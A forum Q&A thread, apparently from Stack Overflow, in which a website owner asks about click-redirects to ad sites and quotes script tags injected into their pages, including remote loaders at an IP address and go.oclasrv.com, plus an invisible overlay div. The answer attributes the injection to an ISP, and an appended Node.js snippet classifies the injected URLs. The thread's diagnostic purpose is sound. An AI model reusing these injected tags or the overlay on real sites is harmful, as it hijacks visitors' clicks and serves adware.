
Unknown scripts are running and redirecting on click to unknown websites

Problem: Sometimes, on clicking the navbar menu or any div on my Bootstrap website, it redirects to ads or unknown links in a new tab, something like this:

http://cobalten.com/afu.php?zoneid=1365143&var=1492756

Imported links from hosted file:-

    <link rel="stylesheet" type="text/css" href="css\bootstrap.min.css">

    <script src="js/jquery.min.js"></script>
    <script src="js/main.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>


    <link rel="stylesheet" type="text/css" href="css\style.css">

    <link href="https://fonts.googleapis.com/css?family=Montserrat" rel="stylesheet" type="text/css">

    <link href="https://fonts.googleapis.com/css?family=Lato" rel="stylesheet" type="text/css">

    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.0.8/css/all.css" integrity="shaxxx-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
        crossorigin="anonymous">

    <script src="https://maps.googleapis.com/maps/api/js?key=xxxxxxxxxxxxxxxxxxxxxxxxxx&callback=myMap "></script>

What I got in Inspection:-

I checked my code multiple times when there was no redirect on clicking the menu, and I found nothing suspicious. But then, when I got redirect links on click, I checked my code in the browser and I could clearly see a few script sources added to my files (visible in the browser's inspection mode only). They are not written in my code. The unknown parts of my code are:

1) The following 2 scripts are replacing the script js/jquery.min.js in the head tag:

<script src='//117.240.205.115:3000/getjs?nadipdata="%7B%22url%22:%22%2Fjs%2Fjquery.min.js%22%2C%22referer%22:%22http:%2F%2Famans.xyz%2F%22%2C%22host%22:%22amans.xyz%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D"&amp;screenheight=768&amp;screenwidth=1360&amp;tm=1530041241377&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0' async=""></script>

<script src="http://amans.xyz/js/jquery.min.js?cb=1530041241381&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag" type="text/javascript"></script>

2) This one is being added to the body tag right after I imported the Google API:

<span id="notiMain">
<script src="//go.oclasrv.com/apu.php?zoneid=1492761" type="text/javascript"></script>
</span>

3) This one is also in the body tag:

<div class="pxdouz70egp12" style='left: 0px; top: 9360px; width: 658px; height: 650px; background-image: url("data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"); position: absolute; z-index: 2000;'></div>

4) On inspecting the redirect link, the headers info:

Request URL: http://cobalten.com/apu.php?zoneid=1492761&_=1530105294644
Request Method: GET
Status Code: 200 OK
Remote Address: 188.42.162.184:80
Referrer Policy: no-referrer-when-downgrade
Cache-Control: private, max-age=0, no-cache
Connection: keep-alive
Content-Encoding: gzip
Content-Type: application/x-javascript
Date: Wed, 27 Jun 2018 13:14:57 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Pragma: no-cache
Server: nginx
Strict-Transport-Security: max-age=1
Timing-Allow-Origin: *, *
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-Used-AdExchange: 1
Provisional headers are shown
Referer: http://amans.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
zoneid: 1492761
_: 1530105294644

What I have tried:-

My code is clean and there is no script which is redirecting it to somewhere. It may be my browser or Windows being compromised. I checked the website from 3 browsers (Edge, Chrome, Firefox) and got the same problem. Then I upgraded to Windows 10 from Win7 and did a fresh install, but nothing happened. Then I thought of asking Hostgator support if the server is compromised; they replied it's okay from their end. I installed Malwarebytes and all software to solve it, but they just notify that Chrome / Firefox / Edge is redirecting to outbound ID with some domain name, mostly go.oclasrv.com, and do nothing.

ANY SOLUTION???

UPDATE:-

I got a similar redirect on the Hostgator support feedback link.

On noticing, here the domain name in the string is replaced by rateus.in. zoneid=1492761 is the same whatever unsecure link I open; also cb=xxxxxxxxxxxx and tm=xxxxxxxxxxx change for different links, and fingerprint=c2VwLW5vLXJlZGlyZWN0 is the same for all links I open.

<script async="" src="//117.240.205.115:3000/getjs?nadipdata=&quot;%7B%22url%22:%22%2Fcommon%2Fjs%2Fjquery-1.7.1.js%22%2C%22referer%22:%22http:%2F%2Frateus.co.in%2Findex.php%3Fbrowse%3DHostGatorIN_Chat_HGIChatCSAT%22%2C%22host%22:%22rateus.co.in%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D&quot;&amp;screenheight=768&amp;screenwidth=1360&amp;tm=1530191489196&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0"></script>

<script type="text/javascript" src="http://rateus.co.in/common/js/jquery-1.7.1.js?cb=1530191489199&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag"></script>

<span id="notiMain"><script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1492761"></script></span>

My OS is completely upgraded to Win10 Pro and I have installed only Chrome without any plugins.

The problem is browser independent, as I got the same results on Edge and Firefox.

ANY JS EXPERT WHO CAN HELP ME OUT HERE

aman asked Jun 27 '18 14:06


1 Answer

This seems to be a case of the ISP injecting JavaScript files. Are you by any chance on BSNL broadband? For the last few days, BSNL seems to be injecting adware on HTTP (non-encrypted) sites.

The only solution I know is to host your site on HTTPS or change your ISP.

Jayson Chacko answered Oct 02 '22 20:10
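
Added example (not part of the original question or answer): a Node.js triage of the script URLs shown in the question, classifying each against the hosts the page itself references and decoding the `nadipdata` and `fingerprint` parameters the injected tags carry. The expected-host set, the verdict labels and all function names are assumptions made for illustration.

```javascript
// Script URLs copied from the question's DevTools output (&amp; decoded to &).
const PAGE_URL = "http://amans.xyz/";
// Assumption: hosts the page's own markup loads scripts from.
const EXPECTED_HOSTS = new Set(["amans.xyz", "maxcdn.bootstrapcdn.com", "maps.googleapis.com"]);

const OBSERVED_SCRIPTS = [
  '//117.240.205.115:3000/getjs?nadipdata="%7B%22url%22:%22%2Fjs%2Fjquery.min.js%22%2C%22referer%22:%22http:%2F%2Famans.xyz%2F%22%2C%22host%22:%22amans.xyz%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D"&screenheight=768&screenwidth=1360&tm=1530041241377&lib=true&fingerprint=c2VwLW5vLXJlZGlyZWN0',
  "http://amans.xyz/js/jquery.min.js?cb=1530041241381&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag",
  "//go.oclasrv.com/apu.php?zoneid=1492761",
  "https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js",
];

// Node.js base64 decode; in a browser, atob() does the same job.
function decodeBase64(value) {
  return Buffer.from(value, "base64").toString("utf8");
}

// nadipdata is URL-encoded JSON wrapped in literal double quotes.
function parseNadipdata(raw) {
  if (raw === null) return null;
  try {
    return JSON.parse(raw.replace(/^"|"$/g, ""));
  } catch {
    return null; // not the format seen in the question
  }
}

function classifyScript(src, pageUrl = PAGE_URL, expected = EXPECTED_HOSTS) {
  const url = new URL(src, pageUrl); // resolves protocol-relative URLs like the browser
  const fingerprint = url.searchParams.get("fingerprint");
  const meta = parseNadipdata(url.searchParams.get("nadipdata"));
  let verdict = "expected";
  if (!expected.has(url.hostname)) verdict = "foreign-host";
  // Heuristic from the question: first-party URLs gained cb/fingerprint params.
  else if (fingerprint !== null) verdict = "rewritten-first-party";
  return {
    host: url.host,
    cleartext: url.protocol === "http:", // only cleartext responses can be rewritten in transit
    verdict,
    fingerprint: fingerprint === null ? null : decodeBase64(fingerprint),
    replacedUrl: meta ? meta.url : null, // original script path named by the injected tag
  };
}

function auditScripts(sources = OBSERVED_SCRIPTS) {
  return sources.map((src) => classifyScript(src));
}
```

The decoded `nadipdata` names the page's own `/js/jquery.min.js`, which matches the asker's observation that the injected tags replace that script, and the only entry not marked `cleartext` is the one already loaded over HTTPS.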